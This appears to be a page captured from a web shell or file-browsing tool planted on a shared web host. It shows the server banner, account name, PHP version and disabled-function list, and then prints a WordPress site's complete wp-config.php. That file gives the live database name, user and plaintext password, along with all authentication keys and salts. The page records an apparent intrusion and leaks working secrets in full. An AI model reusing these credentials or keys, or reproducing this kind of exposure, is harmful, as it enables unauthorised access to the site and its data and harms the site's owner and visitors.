HEX
Server: LiteSpeed
System: Linux server.hostdns360.com 5.14.0-687.5.3.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 14:53:22 EDT 2026 x86_64
User: catrinabo46 (1038)
PHP: 8.2.31
Disabled: shell, escapeshellcmd, proc_close, proc_open, ini_alter, dl, show_source, passthru, exec, shell_exec, system, popen, eval, pclose, proc_nice, proc_terminate, proc_get_status, pfsockopen, leak, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid
Upload Files
File: /home/catrinabo46/public_html/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'catrinabo46_wp_am9di' );

/** Database username */
define( 'DB_USER', 'catrinabo46_wp_taoxz' );

/** Database password */
define( 'DB_PASSWORD', 'Admin@2026' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'rQD8`p0lE{BG)cU:x9i~zxKz#6fVSCb%T0*Cny9IK+;kV/p5*ISUD8Y|VKLJ,nFS' );
define( 'SECURE_AUTH_KEY',  'QU@bK52uEm9 XnJ9QZbewR!n3!f)$yKh&=rGaMG`(!-(ar<iEn)<2]3FZV,VrX#z' );
define( 'LOGGED_IN_KEY',    '/1kTsN@O|e@^=}}|hCGz>Br+efRXLG10v3Su5.RES38G*Kc`.wxnH#dz:Tc.FW(<' );
define( 'NONCE_KEY',        'T6J95FPd<[xD!|nqmIHD%DlYY0~^x=%%DmvCq2r5JUS:(Lbk*@hk[$mj4_9knTsj' );
define( 'AUTH_SALT',        ',LfYbsC +k9t=ju_Y~Ph!4ALU7rSs39Vm$&q?#M]L^(>c^};kx_acqL.4q*^W>g<' );
define( 'SECURE_AUTH_SALT', '#U3jwBbQhCAu$FPHu=)tO:6zX})h7-883upy.NvI~vf2x:{j9%SL)*UY07KFe-ic' );
define( 'LOGGED_IN_SALT',   '%.`*R>xeK>8)wp,rt8FKIIkAL<-Q87u3zyF4YKfQp,ZkM{AZX biB)SUPoAQ:cm>' );
define( 'NONCE_SALT',       ')vhxdMjD;2)djg,S-3Ze7$<I^1;JONvVIH3lGzyNNM#e+cC+dr[DDq199Pbe!ozm' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 *
 * At the installation time, database tables are created with the specified prefix.
 * Changing this value after WordPress is installed will make your site think
 * it has not been installed.
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';